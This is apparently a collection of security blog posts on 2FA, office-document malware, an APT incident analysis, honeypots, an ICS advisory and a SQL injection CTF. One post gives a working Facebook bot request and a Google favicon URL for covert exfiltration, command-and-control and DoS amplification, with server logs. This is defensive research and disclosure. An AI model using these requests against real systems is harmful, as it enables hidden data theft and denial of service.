Two-step authentication is a protection approach widely known among cyber security people but it is not that known among regular users. This article aims to teach everybody about it, as domestic user accounts are more and more targeted by hackers.

We need a unique user ID on the domain in order to access any service on it, this could be a nickname, email address, identity card number, NI number, for example. This information identifies the user, but since it is not secret and anyone could know it, it does not confirm that the user is who they claim to be.

So the user needs to provide something else within the user ID to make the system trust him/her and get access. There are three kinds of authentication factors:

• Something the user knows: password, pin, passphrase, etc.
• Something the user has: pendrive, security key, smartcard, key generator, etc.
• Something unique to the user: fingerprint, retinal pattern, DNA sequence, signature, face, voice or other biometric identifier, etc.

Traditional authenticating methods, well known by everybody, involve the use of a unique user ID within a password that is only known by the user, but what happens if the password is intercepted or stolen by another user? You will not know this on your own.

Two-step authentication is also known as 2FA or TFA and involves the using of two factors of those already stated: the most typical scenario is the time-based one-time passwords. Users must provide his/her password within a one-time key, which is valid for a few seconds and is usually generated on a mobile phone. The mobile phone must be previously configured by introducing a seed for key generating. A hacker might intercept the user password and temporary key, but this would be useless since this is a time-based one-time key. A hacker would need the key generating seed instead, but it never leaves the computer, so a man-in-the-middle attack does not have any effect.

There are scenarios where the temporary key is generated on the server side and it is sent to the user with a text message or email.

You might think using temporary keys are not comfortable enough, if this is your case you can purchase one of the security keys available on the Internet. They are USB drives which contain a certificate and must be plugged into a USB socket anytime you authenticate by entering username and password.

This is a very good technique to harden security and make things tough for hackers but, however this is not 100% secure as security usually breaks by the weakest link: the user. Kevin Mitnick says in his biography: “Gosh in the wires”, that he managed to convince a network operator of a very important company to skip this protection by telling him he would be an employee who forgot his smartcard.

You are probably eager to use Two-step authentication at this point, and you are wondering: Where can I use it?

It is available in more and more services, but unfortunately not yet in all of them. Some of these services are Google, Dropbox, Facebook, PayPal, eBay and Twitter. You can find a table of services that offer this kind of authentication and how they implement it in https://twofactorauth.org/.

Summarizing, Two-step authentication:

• Reduces or removes account stealing by phishing.
• Removes account stealing by man-in-the-middle attacks.
• It makes impersonalization tougher.
• It gives you something to talk to your friends about when they ask you: What is that weird, geeky pendrive on your keyring? And then you can entertain them by telling them about what you’ve just read, or even better, write your own article!

You can find some valuable information regarding MFA in this extenal resource: https://pixelprivacy.com/resources/two-factor-authentication/.

One of the main routes of malware infection is through office automation documents. They represent a very potent vector of infection, specially in directed attacks and phishing campaigns.

These documents are crafted to carry hidden macros, OLE objects, executables, etc., which, once the user opens the document, conduct a series of malicious actions to obtain information with the idea of profiting from it or simply damaging the system. Generally, this type of generic malware downloads other malware for the Internet (droppers), exploits system vulnerabilities, duplicates itself to assure its lifespan in the system, exfilters user information, etc.

A very useful tool for analyzing and detecting anomalous patterns in office automation documents is the “OfficeMalScanner” suite, which you can download from the author’s web, http://www.reconstructer.org/.

[Read more…]

IT security is almost always complex, covering many different areas and creating the sensation of a technical equivalent to “doctors’ handwriting”.

Who hasn’t had a moment where two security technicians start talking about the “APT exploiting a XP kernel CVE and exfiltered by HTTP using 404 modifieds, and thank God the IDS caught it and we put up a deny in the firewall before it dropped a new version of the malware C2”.

If you’re a security technician you’re probably smiling at these lines, but if not, you probably haven’t understood a word of it. The problem is obvious: IT security is complicated, and communicating in IT security is even more complicated.

In my opinion, all us IT security experts should work on our communication skills. We need to convince management to invest more time and resources in improving it, and convince users that security is necessary (for their own good in many cases).

For that reason, I’d like to propose a book list, of texts written by technicians, but where several of the main IT security concepts are explained in clear, simple and even agreeable ways.

”Secrets and Lies: Digital Security in a Networked World”, Bruce Schneier – Ed Wiley

Schneier is one of the best disseminators of IT security around at the moment. As well as his IT security blog he has published several books where he treats in a simple way such subjects as risk, system protection, cryptography and even society’s own trust base. All his books are interesting but “Secrets and lies” is the best. If your boss only has time to read one security book, let it be this one.

”The Code book”, Simon Singh – Ed. Anchor

If there’s one field of IT security that’s particularly complicated that’s cryptography (I have the theory that “public key cryptography can only be understood the third time it’s explained”). However, Singh does a great job of perfectly explaining the most complex concepts of cryptography, all based on historic moments and full of anecdotes. A wondrous book.

“Countdown to Zero Day: Stuxnet and the Launch of the World’s First Digital Weapon”, Kim Zetter – Ed Crown

Stuxnet is considered by many to be the first act in the cyberwarfare in all senses: intention, sophistication and complexity are words that spring to mind when we think about a malware that, possibly, has opened Pandora’s box and without doubt will be studied in future times. Zetter is able to tell us how it was detected, analyzed and eradicated in such a pleasant almost addictive way and his story becomes a kind of techno thriller.

“Spam Nation: The Inside Story of Organized Cybercrime-from Global Epidemic to Your Front Door” – Brian Krebs, Ed. Sourcebooks

Krebs is possibly the most famous journalist specialized in IT security in the world. From blog“>his blog he analyses all the most important IT security news critically but clearly. His book is a complete guide to cybercrime, telling us, with all the inside details, the sub world of IT crime from spammers to how they launder the money they make.

“The Art of Intrusion: The Real Stories Behind the Exploits of Hackers, Intruders and Deceivers” – Kevin Mitnick & William Simon, Ed. Wiley

Kevin Mitnick (aka “The Condor”) is one of the better known hackers in history, being especially famous for his mastery of social engineering (or as he calls it, “hacking people”). In his book, based on his own stories and those of other hackers from the time, he tells how to overcome several different security systems with few or no technicisms. Applying lateral thinking is very interesting and how they attack certain problems jumping security in sometimes dumb but very effective ways.

“Inside cyberwarfare” – Jeffrey Carr, Ed O’Reilly

Cyberwarfare, cyberespionage, cybercrime… However tightly we close our eyes, they’re still going to be there. Carr makes a very complete list of problems we can find in the Internet, concentrating on how far different countries are capable of cyberwarfare, as well as the different scenarios and technologies to use. Although Carr is analytical and clear, running from trying to panic people, the fear it puts into you when you read it is … upsetting.

There are plenty more “simple” books talking about IT security, but these are the ones I think most representative. What about you? Do you have a bedside book to teach non-technicians about IT security? Share it!

Editor’s Note: tomorrow morning our colleague Antonio Sanz is going to be giving a talk on the malware described in this post, and the handling of the incident associated with its detection at CCN-CERT‘s 8th STIC Conferences.

Last August, several possibly targeted employees of one of our customers (a strategic company) received a number of messages somewhat “suspicious” that concerned the then relatively recent crash of the Malaysia Airlines plane.

After about 12 minutes (!) waiting, the sample finally tried to contact something, and, to our surprise, that something was a public WebDAV provider service. So the malware used that protocol over HTTP (and not over HTTPS, according to the results of our latest tests), for anything it was trying to receive, or to transmit…

Indeed, simulating the WebDAV server to which it was trying to connect in our lab, the sample was trying first to download information from a particular path inside the WebDAV, and then it uploaded into another path some pseudorandom named files (but with known file extensions).

This DLL (dropped directly into %SystemRoot% if the user had the necessary privileges, or into the user’s profile otherwise) was loaded using the Windows command regsvr32, persisting through an invocation of that command on the usual HKCU\Software\Microsoft\Windows\CurrentVersion\Run registry branch. For this attachment, the key was written with the name Barbicas (a word resembling “small beard” in spanish).

So far, we had an unknown malware, capable of connecting to an Internet WebDAV server (an original protocol, in comparison to other documented campaigns), and capable of both downloading (command and control channel) and uploading (exfiltration channel) AES-encrypted information (with a 256 bits key length) from/to different paths of the WebDAV.

But the surprises were not over yet; after analyzing the remaining attachments (remember that several users of the organization received malicious messages), we saw that each one was different from the others:

• The dropped statement about the plane crash (the “clean” document) turned out to be the same for all attachments
• Both the dropped .vbs and DLL were distinct for each message (both the DLL name, always trying to imitate some legitimate Windows DLL, and the DLL file contents)
• The registry key used (Barbicas for the first sample analyzed) was distinct for each dropper
• Unpacking time was also distinct for each attachment, varying from 8 minutes to more than 15 minutes (in any case, the process was keeping one of the CPUs at 100% usage)
• The WebDAV server was the same for all samples, as well as the username and password used to log into it (which it does not mean that, for other possible victim organizations or campaigns, were not generating artifacts that used another credentials)
• However, both the AES 256 bits key and the upload (exfiltration) and download (command and control) paths were different for each analyzed sample (in all cases, all that information was present in the memory of the unpacked DLL)
• The extensions used in the uploaded files (.TAR, .TIF, .TXT, etc. for the first attachment analyzed) were distinct for each sample

Therefore, it’s clear that what we saw was probably a possible campaign using (so far) unknown malware, and selecting the victims in a highly targeted way. The attackers used some kind of artifact generator; once a copy is generated, it uniquely identifies the victim as well as the exfiltrated information, by its use of distinct accounts, directories, file extensions and AES keys for each mutation. Furthermore, it is clear that this was almost certainly the first phase in what could have been a longer persistence in the victim organization.

We don’t know what it would have been possible to find after a few weeks, or months, of effective compromise.

Update: on December 8, 2014, Symantec (re)codenames the malware (or at least one of its mutations) as Infostealer.Rodagose (Number of infections: 0 – 49, Number of Sites: 0 – 2). We still prefer Barbicas :-)

It’s been over 4 months since we saw the malware for the first time and an AV vendor has begun to to detect it (and so far, we are not aware of more public presence), reporting “few” infected sites (therefore, is it a campaign that has affected several organizations?); the above, and the character of the highly targeted victims we saw in the case of our customer, maintains the “enigma” for the moment. We will try to keep you informed as more information emerges.

Update 2: on December 9, 2014, Blue Coat publishes a report, (re-re)codenaming the malware as Inception. All information in the report is consistent with what our team observed in August 2014. It seems clear that it’s an APT campaign.

Update 3: on December 10, 2014, Kaspersky codenames it Cloud Atlas.

In the world of advanced persistent threats or APTs, techniques used by malware artifacts play an important role in communication and exfiltering information via C2s (Command & Control). In this sense, there are as many as there are protocols and services and an attacker can draw from his/her imagination. As just small examples of “tricks” for disguising illegitimate traffic as apparently normal information are:

• HTTP requests to apparently licit pages, which have been cracked, housing C2 code.
• Overuse of DNS protocol to exfilter and communicate with attackers.
• Overuse of Google Calendar.

The above list can be almost as long as the number of present and past APT campaigns. In this post I’d like to offer a new form of exfiltration where the infected equipment and C2 don’t directly exchange information at any time. They do so through a legion of bots available to the great giants of the Internet: Google, Facebook or Twitter among others.

What are these bots for or what’s their function? With Facebook, they have a series of agents used to conduct a preview of the content in a link when a comment is posted on this social network. By doing so, it’s possible to present the user with the linked web content in a pleasanter way. So, when the link is received by Facebook they “order” their bots to visit the URL by extracting information from the associated web.

The reader will have realized that by controlling the URL which we want the bots to connect to, we have a way to send information to a domain owed by the attacker, redirecting the request via Facebook. This gives us the first “Infected equipment” -> “C2” communication channel. The request will go unnoticed by any of the victim’s possible security analysts as they’re really requests made against the social network.

The first obstacle to executing the redirection came from the need to have a valid Facebook account and be authenticated to post. Searching a bit further through their documentation, I found I could post without being authenticated. The magic was in the “Developers” section. I can hereby leave you with the GET request that allows you to control Facebook’s bots at your fancy and visit all you resend them.

https://www.facebook.com/plugins/comments.php
?api_key=113869198637480
&channel_url=http://static.ak.fbcdn.net/connect/xd_proxy.php?version=3#cb=f10df33f48&
origin=http://developers.facebook.com/f29957fd8&relation=parent.parent&transport=postmessage
&href=DOMAIN TO VISIT
&locale=en_US
&numposts=2
&sdk=joey
&width=500

The quick-witted will have already realized that you can use this not only to exfilter information but also, for example, to conduct hidden DoS attacks or increase visitor counts. As an example, I’m giving you my apache log, after telling Facebook to visit my website.

66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-" 
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-"
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/spotlight.jpg HTTP/1.1" 206 2582 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_4.jpg HTTP/1.1" 206 1356 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome-18.jpg HTTP/1.1" 206 8889 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1      
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/welcome.jpg HTTP/1.1" 206 3987 
   "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.112 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-11.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.117 - - [30/Oct/2014:11:45:17 +0100] "GET /images/services.jpg HTTP/1.1" 206 2794 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
      (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:44:23 +0100] "GET /kaka333333339 HTTP/1.1" 404 508 "-" 
    "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:16 +0100] "GET / HTTP/1.1" 206 3008 "-" 
   "facebookexternalhit/1.1 (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.116 - - [30/Oct/2014:11:45:17 +0100] "GET /images/btn_3.jpg HTTP/1.1" 206 1227 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
       (+http://www.facebook.com/externalhit_uatext.php)"
66.220.152.118 - - [30/Oct/2014:11:45:17 +0100] "GET /images/lines-09.jpg HTTP/1.1" 206 654 
    "http://miserver.no-ip.org/" "facebookexternalhit/1.1 
       (+http://www.facebook.com/externalhit_uatext.php)"

The truth is you can get good amplification as one request to Facebook generated 43 GETs from 10 different bots to the desired website. But, I’m changing the subject, we’re with the APTs.

Now we can exfilter, we need to send control commands to the infected equipment in the victim organization. For this part we’ll look to the Google bots for help. These we can also control so that they not only visit what we want but also send our orders to the infected equipment.

Usually when a C2 wants to execute a command in the victim, it’s not done in the C2 -> “infected equipment” direction but just the opposite, as the malware carrier starts the communication.

Well, Google has a url through which, given a domain, it returns its own favicon, which is perfect for resending back the orders to be executed in the infected equipment.

http://www.google.com/s2/favicons?domain=DOMAIN-TO-VISIT

Once executed, we can see the next request made by the bot in the C2 log:

66.249.93.181 - - [31/Oct/2014:13:36:22 +0100] "GET / HTTP/1.1" 200 2961 "-" 
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"
66.249.93.178 - - [31/Oct/2014:13:36:23 +0100] "GET /favicon.ico HTTP/1.1" 200 1703 "-" 
   "Mozilla/5.0 (Windows NT 6.1; rv:6.0) Gecko/20110814 Firefox/6.0 Google favicon"

In this favicon we could, using stenographic techniques for example, include the control information sent to the infected equipment. We have thus set up a bi-directional communication with the C2s without having a direct channel between the infected equipment and the command and control equipment, perfect for going unnoticed.

The other day, a friend told me that he was at work, having a coffee; one of those from the machine that are now standard in most companies, you know, a Nespresso. When he pushed the button something strange happened and the machine got stuck in a loop —they get more and more like computers— and the lights were flashing. He turned it off and then on again (my friend is a computer engineer) and everything worked out fine —just like a computer— and he could satisfy his need for caffeine.

A few minutes later, while enjoying his coffee and a chat (my friend is Spanish), he got a call from someone identifying themselves as a member of the coffee machine’s maintenance service staff asking him if there was any problem with the machine. With the coffee machine? No… well, yes, but how did you know? You have it monitored? It’s sent you a fault message? How did it do that? Ah! 3G… No, I didn’t know. Thanks. Bye.

My friend was somewhat mind-boggled. It hadn’t occurred to him the machine could have a direct line out. Not that it was a bad idea. In fact, it’s an excellent idea for the maintenance service, as they can detect faults, even carry out preventive maintenance and, of course, analyze user consumption patterns: when most coffees are taken, how long the machine is working, whether it usually runs out of water or the user fills it before it empties, whether it overheats. All the necessary information not only to maintain the machine, but to improve design on later versions as well, or even optimize performance by simply updating the software (firmware to be more exact) controlling the device.

[Read more…]

In line with a recent Security Art Work post, it is quite easy to come to the conclusion that corporate security makes no sense without user awareness and policy fostering.

Corporate security policies, if any, are often a pipe dream: Almost all employees are aware of them and only a few know some into detail, while only a couple of them are concerned to apply these policies conveniently.

However, these policies are the key for companies to protect important company assets, even more since new trends’ adoption like BYOD (Bring Your Own Device) or COPE (Company Owned Personally Enabled), where the company data flows across mobile devices and where the personal and professional use gets mixed.

If we could wish a system to foster our corporate security policies, our wish list would look like this:

• A system to enable awareness of corporate security policies, instead of reading the policies description. Additionally, it would be really good if it could provide “learn as you go” mechanisms, with recommendations on how to proceed for each situation.
• Make it multi-device and multi-platform (operating system), in order to allow using a wide range of smartphones and tablets, as well as our laptops.
• A framework that, depending on each situation, allows performing a risk analysis of the situation, to balance the best action from a security point of view, taking into account both risks and opportunities.
• A user-centric platform that allows operating without unnecessary interruptions. Ideally, it would be perfect if we barely notice that existence of it, just receiving recommendations in certain situations where there is a high risk for concrete company assets.

That said, as users of the system, we would still miss something very important:

• What about our privacy?
• What kind of interactions would monitor this system?
• Is our personal information safe?

Therefore, the final wish is that it would only collect the necessary data to ensure policy compliance, without storing personal information.

Let’s take an example to make it clearer: If the security policy claims that a blacklisted application should not be installed, the system should monitor only if that concrete application is installed on the device, discarding the information concerning other installed applications.

As for the information that the CSO (Chief of Security Operations) would receive, personal data would be encrypted. Only the action that jeopardizes the company information should be registered, not who came close to violate a corporate policy.

Hence, the goal is not to enable a system that controls users to throw warnings of punishment, but a system automating such control through automated recommendations. These recommendations are meant to reflect the evolution of corporate culture (security awareness), gradually and progressively acquiring corporate policies knowledge. In my opinion, much more bearable that reading an extensive document, with one more advantage: sometimes, documented policies are not easy to relate with our daily tasks.

All these wishes, as well as some ones that will emerge on our way, are the ones that we target in the MUSES project, whose motto is “Corporate security with the user at heart”, coordinated by S2 Grupo, with the participation of partners belonging to several European countries (Sweden, Germany, Austria, Switzerland, Belgium, Italy and Spain).

The possibility of sharing the project towards the creation of an open-source community is one of our main goals. Hence, everybody is welcome to participate on this open-source experience through the participation on our GitHub project.

Starting with this post, we will report on the project development. Meanwhile, please do not forget to follow the project on twitter (@MUSESproject) and facebook (MUSES Project).

Success is a journey, not a destination. We will keep you informed along the way.

Several months ago (october 2013, if I recall correctly), I found some vulnerabilities on an HMI from OMRON. I wrote a post in Spanish describing the almost endless process we went thru from the discovering of the vulnerability to its publication (you can check the automatic Google translation here, though I assume no responsability).

Ten months later, we got the green light from OMRON (with great work by ICS-CERT and other CERTs), probably mostly pressed by our decission to publish the vulnerability at mid-end July. Lucky we’re the good guys. Now the vulnerability has been released: Advisory (ICSA-14-203-01), Omron NS Series HMI Vulnerabilities, so let’s go with the (few) details.

[Read more…]

(Please note this post has been translated, so some strings may appear in Spanish, mainly services names)

In previous posts we have already talked about Dionaea (Spanish), a low-interaction honeypot that offers a variety of network services. The main problem we face when deploying a honeypot is how to customize its services to make them undetectable by scanning tools. The more an attacker takes to detect its interacting with a honeypot, the more likely we will be able analyze its methodology, capture exploits, binaries, etc.

We will install Dionaea and modify some of its services to avoid identification by the network scanner most popular: Nmap.

We can get Dionaea from its project page, with the steps for its installation. In our case we used Ubuntu 12.04 as the base operating system. Active services by default are:

[Read more…]

This time I would like to talk about a challenge I solved lastly and I found quite interesting. In that case, we should access to the private zone (protected with htaccess) of a website that we found there was a blind SQL injection vulnerability (widely known, but if someone does not know it, there is a lot of information on the Internet. For example in https://www.owasp.org/index.php/Blind_SQL_Injection).

In MySQL there is the function load_file that allows the access to a file if the user has the FILE privilege. So, the first thing we have to do is to check if we have this privilege.

Before proceeding, I would like to clarify that all the queries can be done manually – or with scripts done by oneself – but sometimes it is better to use tools already created that make the task much easier and faster. For example, sqlmap.org, is a really good tool to exploit SQL injection vulnerabilities.

[Read more…]